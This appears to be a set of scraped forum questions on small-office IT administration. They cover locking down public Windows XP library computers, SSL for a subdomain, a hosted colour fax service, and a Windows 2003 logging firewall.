How do I Secure and Network 10 Public Computers on Windows XP? Here's the setting: - 10 Public Computers in a library running Windows XP Pro. - There are no central servers or central file storage. - 1 Local Printer. What we want to do: - Secure Public Accounts on each machine, have a default username/password guests can use. - Share the one printer so that all computers may print. Security for Public Accounts: - Cannot run .exe - Cannot run any harmful scripts - Cannot disable anti-virus/anti-spyware - Cannot modify any configuration settings - Have the right to use all applications (ie, office) but without their settings saved. - Dedicate a folder that clears itself at logoff. - Anything I might have missed. Optional: - Be able to perform administrative duties on all 10 computers from one of them (if possible) Right now I was able to network them fairly easily but one computer wouldn't access the printer for some reason, the biggest issue is the public account one. Any part of the solution is appreciated! Thanks! I'm pretty familiar with basic security control, would there be a good tool to redefine the permissions on guest or some user account to make sure it's "locked" down? Some tool that would allow me to easily fine tune the permissions. I am already familiar with basic security as I am studying MIS right now. But the courses never really gets into the practical side for a small network. They would explain how to set ActiveDirectory and a central server but forgets the basic stuff. Thanks!

SSL for sub-domain pointed at another website? There is a site “site1.com” hosted on “server-1” with a dedicated IP address and SSL certificate. Now another website “site2.com” hosted on another server “server-2” has pointed their sub domain “sub.site2.com” at “site1.com” IP address and now “sub.site2.com” also loads site1.com. Now how do I install another SSL certificate for this sub-domain “sub.site2.com” so that https://sub.site2.com works? Shall I assign one more IP address to site1.com and then ask site2.com owners to point their sub.site2.com at the second new IP address. Then I purchase an SSL for this second IP address? Please suggest another possible solution(s) to this issue? Thanks much. Vicky

Good Online Corporate Fax Solution? I'm looking for an electronic fax solution for work. The criteria I have to work within are: - It has to support the sending and receiving of colour fax's. - We also don't want something like Zetafax. which requires a dedicated phone line and modem to be setup. - The service must be hosted externally - i.e as mentioned, we don't have to host any kind of line, modem and preferably no server installation. - It needs to have the option to 'print-to-fax' i.e. user clicks print, is prompted for the phone number, enters it and away it goes. - Users also need to be able to 'email-to-fax' i.e. they attach a document to an email, and then then somehow enter the fax number and click print. It's not a long list, but it's a tricky one. I so far can't find any companies operating within the UK that offer all of these services. Thanks Colour is indeed the main problem. I can get everything else, but so far am having no luck with the colour functionality. Unfortunately it is an essential requirement for our business.
Windows Firewall/Router? Hi, I’ve been asked for work to setup a windows based firewall to sit in-between the internet and a small dedicated network we are setting up for visitors. Basically the setup should go : “Intenet” > “ADSL Modem router (netgear)” > “windows 2003svr box running firewall (with 2 network cards)” > “cisco switch” > “visitor PC/Laptops .etc” I can’t just use the routers built in firewall as it does not meet the companies audit/logging requirements. So far I have tried plugging the windows box into the switch and the router then bridging the Ethernet connections; this will allow traffic to pass through the server but not much else (making it a big glorified switch). I thought that by doing this I could use on the windows firewall to manage and log traffic on the bridge but it doesn’t... Additionally TCP/IP filtering (from advanced TCP/IP options) doesn’t seem to work on a windows bridge. Another Idea I’ve had (but haven’t tried) is to setup a new network on the server by running DNS/DHCP and setup windows routeing to have the netgear routers network and this new network talk. But it just seems like to much effort, I mean when using a packet analyzing tool like wireshark, I can see all the packets passing over the bridge I setup….. I just need to filter/log them? Any ideas?.... maybe an online guide(crosses fingers)? p.s. Please don’t suggest a Linux solution like smoothwall, I have already done this but I have to use a windows box apparently.
